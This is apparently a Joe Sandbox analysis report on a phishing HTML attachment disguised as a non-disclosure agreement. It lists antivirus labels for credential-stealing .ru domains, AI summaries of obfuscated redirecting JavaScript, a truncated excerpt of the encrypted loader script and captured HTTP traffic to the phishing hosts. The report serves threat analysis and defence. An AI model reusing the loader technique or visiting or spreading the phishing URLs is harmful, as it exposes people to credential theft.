Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Non-Disclosure Agreement.html

Overview

General Information

Sample name:Non-Disclosure Agreement.html
Analysis ID:1578290
MD5:d74890dfd9c79b413ae350a8ca00d8b4
SHA1:44ecae08c9529f9292e1797566aac34146ae1104
SHA256:d80348747048ec9c6851f6a6e0120d733098148dc1ee7e28128e96ea56160b5d
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
HTML file submission requesting Cloudflare captcha challenge
Multi AV Scanner detection for submitted file
AI detected suspicious Javascript
Detected javascript redirector / loader
HTML document with suspicious name
HTML document with suspicious title
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64
  • chrome.exe (PID: 5640 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Non-Disclosure Agreement.html" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 6216 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1932,i,11547400420386524786,6182731233480577917,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://e4x6.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#W##[[-Email-]]##SlashNext: Label: Credential Stealing type: Phishing & Social usering
Source: https://e4x6.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/Avira URL Cloud: Label: phishing
Source: https://9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ru/jYpzYHmViExNWkcPprHooqPmcICSNRCVHESWFGPUOAJKQVZYGURNUKQYKRPKQYGKZJLMJYTGUELTFAvira URL Cloud: Label: malware
Source: https://e4x6.gurativez.ru/favicon.icoAvira URL Cloud: Label: phishing
Source: Non-Disclosure Agreement.htmlReversingLabs: Detection: 29%

Phishing

barindex
Source: 0.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://e4x6.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common keyboard shortcuts, and redirecting the user to an external domain. The script also includes a self-executing function that triggers a debugger and then redirects the user, which is a strong indicator of malicious intent.
Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://e4x6.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and URLs further increases the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
Source: 0.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://e4x6.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script uses the `turnstile.render()` function, which can execute remote code, and it sends user data to an unknown domain. Additionally, the script redirects the user to the SharePoint domain if certain conditions are met, which is a suspicious behavior. Overall, this script exhibits a high level of malicious intent and poses a significant security risk.
Source: Non-Disclosure Agreement.htmlHTTP Parser: Low number of body elements: 0
Source: file:///C:/Users/user/Desktop/Non-Disclosure%20Agreement.htmlTab title: Non-Disclosure Agreement.html
Source: https://alternative-magic.com/res444.php?2-687474703a2f2f653478362e67757261746976657a2e72752f6848375f434c66573842303675445a62466d41694c772f-plumwoodHTTP Parser: var lrmklwnoxahunezh = document.createelement("script");lrmklwnoxahunezh.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(lrmklwnoxahunezh);lrmklwnoxahunezh.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoiyzy5dgpya0vmcuczrvbowutqm3bkaejhoxhxbkzuk2tbxc9rcmrooezkv1ryc0fbtnducfriuzzcwkm1wkcwahqrow1qbg03dzb1zkrka3m4ywdryupuzxv4eha1bfrmwgtfvdnwy3lptgplbkrstji4uedjk1zgmitqaun5aue5yznvznrqqmhkbmfwtnnkdtjiegdpkzzpu1zvqtnxshrftfwvcmxgn3bkzgt3umvnmjlnk1vcvfa1bhrxcfnkzuzhcfjmy2z4ystmzdfhsddwzhvknzren1bry3fbsgm0tklzcfpgwe1wegppoerrwm9qrnzxawvtmtd2bwvhy0e2t3bisgtpsfnduzbhuhrcl2jdadd2qlpjde1un0jztmj6qk01bgrlemfpuxbcy3fhnxfkek95vezwbetebzhgmey2zndlrnq1rlbrmnbptgy4c0zpvlvkzgnlylyxampuvvdmc0o1rzl3tfvnnvo1zhnwxc90ahffyxd3ymw3vkvvqnjlcjbtzgpiqm0wq0zxahnlcklkvxflenf0avj1vldvd21bodr2wvy1uzdvskjizudtttq1t0jiwvwvdk5zevarc0hftxhqv09uczfqdufsevj6xc9fy09qblr1a1hkrnjhxc9cl3nqcu1hvtndk2xrq0vnuvbkmu1vzkvztkppouforhbysnfvbmxztlfotjnizcsztuyxvfwvbu1uou...
Source: Non-Disclosure Agreement.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Non-Disclosure%20Agreement.htmlHTTP Parser: No favicon
Source: https://e4x6.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#W##[[-Email-]]##HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49808 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49858 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49919 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49986 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50064 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: global trafficHTTP traffic detected: GET /res444.php?2-687474703a2f2f653478362e67757261746976657a2e72752f6848375f434c66573842303675445a62466d41694c772f-plumwood HTTP/1.1Host: alternative-magic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /res444.php?2-687474703a2f2f653478362e67757261746976657a2e72752f6848375f434c66573842303675445a62466d41694c772f-plumwood HTTP/1.1Host: alternative-magic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hH7_CLfW8B06uDZbFmAiLw/ HTTP/1.1Host: e4x6.gurativez.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e4x6.gurativez.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e4x6.gurativez.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e4x6.gurativez.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e4x6.gurativez.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qmivf/0x4AAAAAAAy6q7iduvs50k8-/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://e4x6.gurativez.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f47c7718f624386&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qmivf/0x4AAAAAAAy6q7iduvs50k8-/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qmivf/0x4AAAAAAAy6q7iduvs50k8-/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f47c7718f624386&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: e4x6.gurativez.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://e4x6.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlA0ZjZaaWtlSXpkL2RLaG9Ja1BmZ3c9PSIsInZhbHVlIjoiYW54anBCNDl5b0VMMWcreGUvR1RUVnVqRWJUMVg3Myt4bnhMN0YxSjFmcGMyV0h5YWVySG1rRFhCY1R5emJOWXcySUtiU214VGhSUGtWRGVlVjJSRkd1elo0bFA1dkJDUkhJa2dBT09qdWlVNm5HNzRSODBpbmlSVkRXWTl2Nk0iLCJtYWMiOiI4OWNhMTA2ZmJiMTZlM2NlNDJkMGVmZTA4ZDY1NmU2MjdjM2NkZTFlMjg3NmQ3ZDhlNjc1MjU2NWExOGRlOTBiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlYxUDBHcVZRZTQyQUlYS2Q4QUVSSXc9PSIsInZhbHVlIjoiaHFoZzRqV3dKeUVJY1YxZWFraWg5dS9MaDMxeUNqcFpPcXp1SXJnOWNrSEplekxOZ2gwRDFFTWI5eEN0ejNjb1E5eG9zTHVSSCsxd0p3bzRxRDVqUzhTZUp5V1JTS3NVUDZySzQ1MHlEK2NkUVhtTVZvc0FvVVlqM29QOWJqV2wiLCJtYWMiOiI5MTIyNTViYzM4YmViOTdmYjgxMDlmZjZkNGNhZmY4OTQyZjk5Mzk0ZWIxMmVjMWM2MWJkOGVkODE0ODZkN2NjIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1491058030:1734614036:lGnvY1elWyH7EhRRkOdPFDBDdTK2Q-wX130xIM0yJB4/8f47c7718f624386/7H8LG5SnqbO3T10Wvi8IaJOK4p16EBaa_PQ0ofUlBXE-1734615360-1.1.1.1-uFkKOZXfTSe_1mvdIu74Z9OPpAcKlUkRYImsDd1U2O350IQ4ldpJZv.sdf1vctVv HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f47c7718f624386/1734615364486/nxr05CllTeOlRC3 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qmivf/0x4AAAAAAAy6q7iduvs50k8-/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f47c7718f624386/1734615364486/nxr05CllTeOlRC3 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8f47c7718f624386/1734615364488/88a3ca94e2ef2da89ec1cf6ab37a3d19f9970f5034a44c54454b9f03bd8a57b0/w1RgJuScIFU0600 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qmivf/0x4AAAAAAAy6q7iduvs50k8-/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1491058030:1734614036:lGnvY1elWyH7EhRRkOdPFDBDdTK2Q-wX130xIM0yJB4/8f47c7718f624386/7H8LG5SnqbO3T10Wvi8IaJOK4p16EBaa_PQ0ofUlBXE-1734615360-1.1.1.1-uFkKOZXfTSe_1mvdIu74Z9OPpAcKlUkRYImsDd1U2O350IQ4ldpJZv.sdf1vctVv HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1491058030:1734614036:lGnvY1elWyH7EhRRkOdPFDBDdTK2Q-wX130xIM0yJB4/8f47c7718f624386/7H8LG5SnqbO3T10Wvi8IaJOK4p16EBaa_PQ0ofUlBXE-1734615360-1.1.1.1-uFkKOZXfTSe_1mvdIu74Z9OPpAcKlUkRYImsDd1U2O350IQ4ldpJZv.sdf1vctVv HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jYpzYHmViExNWkcPprHooqPmcICSNRCVHESWFGPUOAJKQVZYGURNUKQYKRPKQYGKZJLMJYTGUELTF HTTP/1.1Host: 9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://e4x6.gurativez.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://e4x6.gurativez.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
